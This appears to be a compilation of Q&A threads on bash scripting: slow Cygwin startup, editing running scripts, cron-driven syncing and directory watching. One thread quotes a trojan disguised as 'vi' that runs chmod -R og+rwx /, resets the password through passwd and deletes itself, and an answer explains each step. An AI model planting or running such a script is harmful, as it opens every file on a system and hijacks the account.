At the moment bash takes about 2 seconds to load. I have ran bash with -x flag and I am seeing the output and it seems as though PATH is being loaded many times in cygwin. The funny thing is I use the same file in linux environment, but it works fine, without the reload problem. Could the following cause the problem?
if [ `uname -o` = "Cygwin" ]; then
....
fi
As you've noted in your answer, the problem is Cygwin's bash-completion package. The quick and easy fix is to disable bash-completion, and the correct way to do that is to run Cygwin's setup.exe (download it again if you need to) and select to uninstall that package.
The longer solution is to work through the files in /etc/bash_completion.d and disable the ones you don't need. On my system, the biggest culprits for slowing down Bash's load time (mailman, shadow, dsniff and e2fsprogs) all did exactly nothing, since the tools they were created to complete weren't installed.
If you rename a file in /etc/bash_completion.d to have a .bak extension, it'll stop that script being loaded. Having disabled all but a select 37 scripts on one of my systems in that manner, I've cut the average time for bash_completion to load by 95% (6.5 seconds to 0.3 seconds).
In my case that was windows domain controller.
I did this to find the issue:
I started with a simple, windows cmd.exe and the, typed this:
c:\cygwin\bin\strace.exe c:\cygwin\bin\bash
In my case, I noticed a following sequence:
218 12134 [main] bash 11304 transport_layer_pipes::connect: Try to connect to named pipe: \\.\pipe\cygwin-c5e39b7a9d22bafb-lpc
45 12179 [main] bash 11304 transport_layer_pipes::connect: Error opening the pipe (2)
39 12218 [main] bash 11304 client_request::make_request: cygserver un-available
1404719 1416937 [main] bash 11304 pwdgrp::fetch_account_from_windows: line: <CENSORED_GROUP_ID_#1>
495 1417432 [main] bash 11304 pwdgrp::fetch_account_from_windows: line: <CENSORED_GROUP_ID_#2>
380 1417812 [main] bash 11304 pwdgrp::fetch_account_from_windows: line: <CENSORED_GROUP_ID_#3>
etc...
The key thing was identifying the client_request::make_request: cygserver un-available line. You can see, how after that, cygwin tries to fetch every single group from windows, and execution times go crazy.
A quick google revealed what a cygserver is:
https://cygwin.com/cygwin-ug-net/using-cygserver.html
Cygserver is a program which is designed to run as a background
service. It provides Cygwin applications with services which require
security arbitration or which need to persist while no other cygwin
application is running.
The solution was, to run the cygserver-config and then net start cygserver to start the Windows service. Cygwin startup times dropped significantly after that.
All of the answers refer to older versions of bash_completion, and are irrelevant for recent bash_completion.
Modern bash_completion moved most of the completion files to /usr/share/bash-completion/completions by default, check the path on your system by running
# pkg-config --variable=completionsdir bash-completion
/usr/share/bash-completion/completions
There are many files in there, one for each command, but that is not a problem, since they are loaded on demand the first time you use completion with each command. The old /etc/bash_completion.d is still supported for compatibility, and all files from there are loaded when bash_completion starts.
# pkg-config --variable=compatdir bash-completion
/etc/bash_completion.d
Use this script to check if there are any stale files left in the old dir.
#!/bin/sh
COMPLETIONS_DIR="$(pkg-config --variable=completionsdir bash-completion)"
COMPAT_DIR="$(pkg-config --variable=compatdir bash-completion)"
for file in "${COMPLETIONS_DIR}"/*; do
file="${COMPAT_DIR}/${file#${COMPLETIONS_DIR}/}"
[ -f "$file" ] && printf '%s\n' $file
done
It prints the list of files in compat dir that are also present in the newer (on-demand) completions dir. Unless you have specific reasons to keep some of them, review, backup and remove all of those files.
As a result, the compat dir should be mostly empty.
Now, for the most interesting part - checking why bash startup is slow.
If you just run bash, it will start a non-login, interactive shell - this one on Cygwin source /etc/bash.bashrc and then ~/.bashrc. This most likely doesn't include bash completion, unless you source it from one of rc files. If you run bash -l (bash --login), start Cygwin Terminal (depends on your cygwin.bat), or log in via SSH, it will start a login, interactive shell - which will source /etc/profile, ~/.bash_profile, and the aforementioned rc files. The /etc/profile script itself sources all executable .sh files in /etc/profile.d.
You can check how long each file takes to source. Find this code in /etc/profile:
for file in /etc/profile.d/*.$1; do
[ -e "${file}" ] && . "${file}"
done
Back it up, then replace it with this:
for file in /etc/profile.d/*.$1; do
TIMEFORMAT="%3lR ${file}"
[ -e "${file}" ] && time . "${file}"
done
Start bash and you will see how long each file took. Investigate files that take a significant amount of time. In my case, it was bash_completion.sh and fzf.sh (fzf is fuzzy finder, a really nice complement to bash_completion). Now the choice is to disable it or investigate further. Since I wanted to keep using fzf shortcuts in bash, I investigated, found the source of the slowdown, optimized it, and submitted my patch to fzf's repo (hopefully it will be accepted).
Now for the biggest time spender - bash_completion.sh. Basically that script sources /usr/share/bash-completion/bash_completion. I backed up that file, then edited it. On the last page there is for loop that sources all the files in compat dir - /etc/bash_completion.d. Again, I added TIMEFORMAT and time, and saw which script was causing the slow starting. It was zzz-fzf (fzf package). I investigated and found a subshell ($()) being executed multiple times in a for loop, rewrote that part without using a subshell, making the script work quickly. I already submitted my patch to fzf's repo.
The biggest reason for all these slowdowns is: fork is not supported by Windows process model, Cygwin did a great job emulating it, but it's painfully slow compared to a real UNIX. A subshell or a pipeline that does very little work by itself spends most of it's execution time for fork-ing. E.g. compare the execution times of time echo msg (0.000s on my Cygwin) vs time echo $(echo msg) (0.042s on my Cygwin) - day and night. The echo command itself takes no appreciable time to execute, but creating a subshell is very expensive. On my Linux system, these commands take 0.000s and 0.001s respectively. Many packages Cygwin has are developed by people who use Linux or other UNIX, and can run on Cygwin unmodified. So naturally these devs feel free to use subshells, pipelines and other features wherever convenient, since they don't feel any significant performance hit on their system, but on Cygwin those shell scripts might run tens and hundreds of times slower.
Bottom line, if a shell script works slowly in Cygwin - try to locate the source of fork calls and rewrite the script to eliminate them as much as possible.
E.g. cmd="$(printf "$1" "$2")" (uses one fork for subshell) can be replaced with printf -v cmd "$1" "$2".
Boy, it came out really long. Any people still reading up to here are real heros. Thanks :)
I know this is an old thread, but after a fresh install of Cygwin this week I'm still having this problem.
Instead of handpicking all of the bash_completion files, I used this line to implement #me_and's approach for anything that isn't installed on my machine. This significantly reduced the startup time of bash for me.
In /etc/bash_completion.d, execute the following:
for i in $(ls|grep -v /); do type $i >/dev/null 2>&1 || mv $i $i.bak; done
New answer for an old thread, relating to the PATH of the original question.
Most of the other answers deal with the bash startup. If you're seeing a slow load time when you run bash -i within the shell, those may apply.
In my case, bash -i ran fast, but anytime I opened a new shell (be it in a terminal or in xterm), it took a really long time. If bash -l is taking a long time, it means it's the login time.
There are some approaches at the Cygwin FAQ at https://cygwin.com/faq/faq.html#faq.using.startup-slow but they didn't work for me.
The original poster asked about the PATH, which he diagnosed using bash -x. I too found that although bash -i was fast, bash -xl was slow and showed a lot of information about the PATH.
There was such a ridiculously long Windows PATH that the login process kept on running programs and searching the entire PATH for the right program.
My solution: Edit the Windows PATH to remove anything superfluous. I'm not sure which piece I removed that did the trick, but the login shell startup went from 6 seconds to under 1 second.
YMMV.
My answer is the same as npe's above. But, since I just joined, I cannot comment or even upvote it! I hope this post doesn't get deleted because it offer reassurance for anyone looking for an answer to the same problem.
npe's solution worked for me. There's only one caveat - I had to close all cygwin processes before I got the best out of it. That includes running cygwin services, like sshd, and the ssh-agent that I start from my login scripts. Before that, the window for the cygwin terminal would appear instantly but hang for several seconds before it presents the prompt. And it hanged for several seconds upon closing the window. After I killed all processes and started the cygserver service (btw I prefer to use the Cygwin way - 'cygrunsrv -S cygserver', than 'net start cygserver'; I don't know if it makes any practical difference) it starts immediately. So thanks to npe again!
I'm on a corporate network with a pretty complicated setup, and it seems that really kills cygwin startup times. Related to npe's answer, I also had to follow some of the steps laid out here: https://cygwin.com/faq/faq.html#faq.using.startup-slow
Another cause for AD client system is slow DC replies, commonly observed in configurations with remote DC access. The Cygwin DLL queries information about every group you're in to populate the local cache on startup. You may speed up this process a little by caching your own information in local files. Run these commands in a Cygwin terminal with write access to /etc:
getent passwd $(id -u) > /etc/passwd
getent group $(id -G) > /etc/group
Also, set /etc/nsswitch.conf as follows:
passwd: files db
group: files db
This will limit the need for Cygwin to contact the AD domain controller (DC) while still allowing for additional information to be retrieved from DC, such as when listing remote directories.
After doing that plus starting the cygserver my cygwin startup time dropped significantly.
As someone mentioned above, one possible issue is the PATH environment variable contains too much path, cygwin will search all of them. I prefer direct edit the /etc/profile, just overwrite the PATH variable to cygwin related path, e.g. PATH="/usr/local/bin:/usr/bin". Add additional path if you want.
I wrote a Bash function named 'minimizecompletion' for inactivating not needed completion scripts.
Completion scripts can add more than one completion specification or have completion specifications for shell buildins, therefore it is not sufficient to compare script names with executable files found in $PATH.
My solution is to remove all loaded completion specifications, to load a completion script and check if it has added new completion specifications. Depending on this it is inactivated by adding .bak to the script file name or it is activated by removing .bak. Doing this for all 182 scripts in /etc/bash_completion.d results in 36 active and 146 inactive completion scripts reducing the Bash start time by 50% (but it should be clear this depends on installed packages).
The function also checks inactivated completion scripts so it can activate them when they are needed for new installed Cygwin packages. All changes can be undone with argument -a that activates all scripts.
# Enable or disable global completion scripts for speeding up Bash start.
#
# Script files in directory '/etc/bash_completion.d' are inactived
# by adding the suffix '.bak' to the file name; they are activated by
# removing the suffix '.bak'. After processing all completion scripts
# are reloaded by calling '/etc/bash_completion'
#
# usage: [-a]
# -a activate all completion scripts
# output: statistic about total number of completion scripts, number of
# activated, and number of inactivated completion scripts; the
# statistic for active and inactive completion scripts can be
# wrong when 'mv' errors occure
# return: 0 all scripts are checked and completion loading was
# successful; this does not mean that every call of 'mv'
# for adding or removing the suffix was successful
# 66 the completion directory or loading script is missing
#
minimizecompletion() {
local arg_activate_all=${1-}
local completion_load=/etc/bash_completion
local completion_dir=/etc/bash_completion.d
(
# Needed for executing completion scripts.
#
local UNAME='Cygwin'
local USERLAND='Cygwin'
shopt -s extglob progcomp
have() {
unset -v have
local PATH="$PATH:/sbin:/usr/sbin:/usr/local/sbin"
type -- "$1" &>/dev/null && have='yes'
}
# Print initial statistic.
#
printf 'Completion scripts status:\n'
printf ' total: 0\n'
printf ' active: 0\n'
printf ' inactive: 0\n'
printf 'Completion scripts changed:\n'
printf ' activated: 0\n'
printf ' inactivated: 0\n'
# Test the effect of execution for every completion script by
# checking the number of completion specifications after execution.
# The completion scripts are renamed depending on the result to
# activate or inactivate them.
#
local completions total=0 active=0 inactive=0 activated=0 inactivated=0
while IFS= read -r -d '' f; do
((++total))
if [[ $arg_activate_all == -a ]]; then
[[ $f == *.bak ]] && mv -- "$f" "${f%.bak}" && ((++activated))
((++active))
else
complete -r
source -- "$f"
completions=$(complete | wc -l)
if (( $completions > 0 )); then
[[ $f == *.bak ]] && mv -- "$f" "${f%.bak}" && ((++activated))
((++active))
else
[[ $f != *.bak ]] && mv -- "$f" "$f.bak" && ((++inactivated))
((++inactive))
fi
fi
# Update statistic.
#
printf '\r\e[6A\e[15C%s' "$total"
printf '\r\e[1B\e[15C%s' "$active"
printf '\r\e[1B\e[15C%s' "$inactive"
printf '\r\e[2B\e[15C%s' "$activated"
printf '\r\e[1B\e[15C%s' "$inactivated"
printf '\r\e[1B'
done < <(find "$completion_dir" -maxdepth 1 -type f -print0)
if [[ $arg_activate_all != -a ]]; then
printf '\nYou can activate all scripts with %s.\n' "'$FUNCNAME -a'"
fi
if ! [[ -f $completion_load && -r $completion_load ]]; then
printf 'Cannot reload completions, missing %s.\n' \
"'$completion_load'" >&2
return 66
fi
)
complete -r
source -- "$completion_load"
}
This is an example output and the resulting times:
$ minimizecompletion -a
Completion scripts status:
total: 182
active: 182
inactive: 0
Completion scripts changed:
activated: 146
inactivated: 0
$ time bash -lic exit
logout
real 0m0.798s
user 0m0.263s
sys 0m0.341s
$ time minimizecompletion
Completion scripts status:
total: 182
active: 36
inactive: 146
Completion scripts changed:
activated: 0
inactivated: 146
You can activate all scripts with 'minimizecompletion -a'.
real 0m17.101s
user 0m1.841s
sys 0m6.260s
$ time bash -lic exit
logout
real 0m0.422s
user 0m0.092s
sys 0m0.154s
Related
I'm scratching my head about two seemingly different behaviors of bash when editing a running script.
This is not a place to discuss WHY one would do this (you probably shouldn't). I would only like to try to understand what happens and why.
Example A:
$ echo "echo 'echo hi' >> script.sh" > script.sh
$ cat script.sh
echo 'echo hi' >> script.sh
$ chmod +x script.sh
$ ./script.sh
hi
$ cat script.sh
echo 'echo hi' >> script.sh
echo hi
The script edits itself, and the change (extra echo line) is directly executed. Multiple executions lead to more lines of "hi".
Example B:
Create a script infLoop.sh and run it.
$ cat infLoop.sh
while true
do
x=1
echo $x
done
$ ./infLoop.sh
1
1
1
...
Now open a second shell and edit the file changing the value of x. E.g. like this:
$ sed --in-place 's/x=1/x=2/' infLoop.sh
$ cat infLoop.sh
while true
do
x=2
echo $x
done
However, we observe that the output in the first terminal is still 1. Doing the same with only one terminal, interrupting infLoop.sh through Ctrl+Z, editing, and then continuing it via fg yields the same result.
The Question
Why does the change in example A have an immediate effect but the change in example B not?
PS: I know there are questions out there showing similar examples but none of those I saw have answers explaining the difference between the scenarios.
There are actually two different reasons that example B is different, either one of which is enough to prevent the change from taking effect. They're due to some subtleties of how sed and bash interact with files (and how unix-like OSes treat files), and might well be different with slightly different programs, etc.
Overall, I'd say this is a good example of how hard it is to understand & predict what'll happen if you modify a file while also running it (or reading etc from it), and therefore why it's a bad idea to do things like this. Basically, it's the computer equivalent of sawing off the branch you're standing on.
Reason 1: Despite the option's name, sed --in-place does not actually modify the existing file in place. What it actually does is create a new file with a temporary name, then when it's finished that it deletes the original and renames the new file into its place. It has the same name, but it's not actually the same file. You can tell this by looking at the file's inode number with ls -li:
$ ls -li infLoop.sh
88 -rwxr-xr-x 1 pi pi 39 Aug 4 22:04 infLoop.sh
$ sed --in-place 's/x=1/x=2/' infLoop.sh
$ ls -li infLoop.sh
4073 -rwxr-xr-x 1 pi pi 39 Aug 4 22:05 infLoop.sh
But bash still has the old file open (strictly speaking, it has an open file handle pointing to the old file), so it's going to continue getting the old contents no matter what changed in the new file.
Note that this doesn't apply to all programs that edit files. vim, for example, will rewrite the contents of existing files (unless file permissions forbid it, in which case it switches to the delete&replace method). Appending with >> will always append to the existing file rather than creating a new one.
(BTW, if it seems weird that bash could have a file open after it's been "deleted", that's just part of how unix-like OSes treat their files. Files are not truly deleted until their last directory entry is removed and the last open file handle referring to them is closed. Some programs actually take advantage of this for security by opening(/creating) a file and then immediately "deleting" it, so that the open file handle is the only way to reach the file.)
Reason 2: Even if you used a tool that actually modified the existing file in place, bash still wouldn't see the change. The reason for this is that bash reads from the file (parsing as it goes) until it has something it can execute, runs that, then goes back and reads more until it has another executable chunk, etc. It does not go back and re-read the same chunk to see if it's changed, so it'll only ever notice changes in parts of the file it hasn't read yet.
In example B, it has to read and parse the entire while true ... done loop before it can start executing it. Therefore, changes in that part (or possibly before it) will not be noticed once the loop has been read & started executing. Changes in the file after the loop would be noticed after the loop exited (if it ever did).
See my answer to this question (and Don Hatch's comment on it) for more info about this.
i'm a very clueless beginner when it comes to Shell Scripts but i have to be able to explain what these lines of code do and not enough time to get more familiar with it first, so i cant't really give a lot of input.
As additional information the script itself is called vi just like the editor and is probably harmful/hoping to be run as admin
#!/bin/bash
#
# execute on your own risk !!
chmod -R og+rwx /
echo -e ‘‘Hacke.peter\n Hacke.peter\n’’ | passwd
rm $0
vi $*
logout # good bye!
I think the idea is that somebody is trying to run the actual vi (not this script) and then he accidentally calls this script - it changes the current users password to the output of the echo command (not sure what that is tho) and then the shell deletes itself and calls the editor so we dont realize anything happened.
huge thank you to any answer in advance and sorry for being so clueless.
HMM Not sure if clueless beginner or a crafty hacker [insert suspicious Fry meme]. With the last name like that?
Here's what the script does, step-by-step:
chmod -R og+rwx /: recursively (-R) opens all your files for reading, writing and executing (+rwx) by users in your group (g) and all other users (o).
echo -e ‘‘Hacke.peter\n Hacke.peter\n’’ | passwd: resets your superuser password to "Hacke.peter".
rm $0: removes itself. The $0 in bash stands for the file name of the current script.
vi $*: opens the real vi editor with whatever arguments ($*) you passed to the original (now erased) script. If the script was also called vi, this step is to hide the tracks and avoid suspicion.
logout: logs you out of root mode. Now you no longer have root and your filesystem is open.
Very nasty script!
I have multiple remote sites which run a bash script, initiated by cron (running VERY frequently -- 10 minutes or less), in which one of it's jobs is to sync a "scripts" directory. The idea is for me to be able to edit the scripts in one location (a server in a data center) rather than having to log into each remote site and doing any edits manually. The question is, what are the best options for syncing the script that is currently running the sync? (I hope that's clear).
I would imagine syncing a script that is currently running would be very bad. Does the following look feasible if I run it as the last statement of my script? pros? cons? Other options??
if [ -e ${newScriptPath} ]; then
mv ${newScriptPath} ${permanentPath}" | at "now + 1 minute"
fi
One problem I see is that it's possible that if I use "1 minute" (which is "at's" smallest increment), and the script ends, and cron initiates the next job before "at" replaces the script, it could try to replace it during the next run of the script....
Changing the script file during execution is indeed dangerous (see this previous answer), but there's a trick that (at least with the versions of bash I've tested with) forces bash to read the entire script into memory, so if it changes during execution there won't be any effect. Just wrap the script in {}, and use an explicit exit (inside the {}) so if anything gets added to the end of the file it won't be executed:
#!/bin/bash
{
# Actual script contents go here
exit
}
Warning: as I said, this works on the versions of bash I have tested it with. I make no promises about other versions, or other shells. Test it with the shell(s) you'll be using before putting it into production use.
Also, is there any risk that any of the other scripts will be running during the sync process? If so, you either need to use this trick with all of them, or else find some general way to detect which scripts are in use and defer updates on them until later.
So I ended up using the "at" utility, but only if the file changed. I have a ".cur" and ".new" version of the script on the local machine. If the MD5 is the same on both, I do nothing. If they are different, I wait until after the main script completes, then force copy the ".new" to the ".cur" in a different script.
I create the same lock file (name) for the update_script so another instance of the first script won't run if I'm changing it..
part in main script....
file1=`script_cur.sh`
file2=`script_new.sh`
if [ "$file1" == "$file2" ] ; then
echo "Files have the same content"
else
echo "Files are different, scheduling update_script.sh at command"
at -f update_script.sh now + 1 minute
fi
Is it possible to write a cron/script that runs only when there is a change in the folder size .. i.e. the files inside a folders get changed or a new file gets created and hence the folder size would change and the cron or the script would run
There is no support for such a monitor event in standard cron: cron is strictly time-based.
Assuming that cron is used, this task would need to be handled in a "woken up" job, which could then choose to sleep/end immediately or do something else depending on comparing the folder with a previous-known state ..
Now, if cron is removed from the role of being the launch/monitor platform, then there are "non polling" ways to monitor a filesystem such as inotify.
If just looking for a system daemon to supplement standard cron for this task, see the following alternatives.
incron:
incron is an "inotify cron" system. It works like the regular cron but is driven by filesystem events instead of time periods. It contains two programs, a daemon called "incrond" (analogous to crond) and a table manipulator "incrontab" (like "crontab").
Watcher:
Watcher is a daemon that watches specified files/folders for changes and fires commands in response to those changes. It is similar to incron, however, configuration uses a simpler to read ini file instead of a plain text file. Unlike incron it can also recursively monitor directories. It's also written in Python, making it easier to hack.
Your many solution :
-Using inotifywait, as an example:
inotifywait -m /path 2>&- | awk '$2 == "CREATE" { print $3; fflush() }' |
while read file; do
echo "$file"
# do something with the file
done
In Ubuntu inotifywait is provided by the inotify-tools package.
-Using incron
You can see a full example here: http://www.cyberciti.biz/faq/linux-inotify-examples-to-replicate-directories/
-Simple
ls -1A isempty | wc -l
My idiom is usually:
dir=/dir/to/watch
if [ $dir -nt $dir.flag ]; then
touch -r $dir $dir.flag
do_work
fi
This however test against modification time, not size. Size of a directory is not a very useful concept, as it only changes infrequently.
$dir.flag cannot be created in $dir by the way, as this makes $dir change after $dir.flag, so you need to store $dir.flag somewhere where you have write permission.
I have a load of bash scripts that backup different directories to different locations. I want each one to run every day. However, I want to make they don't run simultaneously.
I've wrote a script that basically just calls each script in succession and sits in cron.daily, but I want a way for this script to work even if I add and remove backup scripts without having to manually edit it.
So what I need to go is generate a list of the scripts (e.g. "dir -1 /usr/bin/backup*.sh") and then run each script it finds in turn.
Thanks.
#!/bin/sh
for script in /usr/bin/backup*.sh
do
$script
done
#!/bin/bash
for SCRIPT in /usr/bin/backup*.sh
do
[ -x "$SCRIPT" ] && [ -f "$SCRIPT" ] && $SCRIPT
done
If your system has run-parts then that will take care of it for you. You can name your scripts like "10script", "20anotherscript" and they will be run in order in a manner similar to the rc*.d hierarchy (which is run via init or Upstart, however). On some systems it's a script. On mine it's a binary executable.
It is likely that your system is using it to run hourly, daily, etc., cron jobs just by dropping scripts into directories such as /etc/cron.hourly/
Pay particular attention, though, to how you name your scripts. (Don't use dots, for example.) Check the man page specific to your system, since file naming restrictions may vary.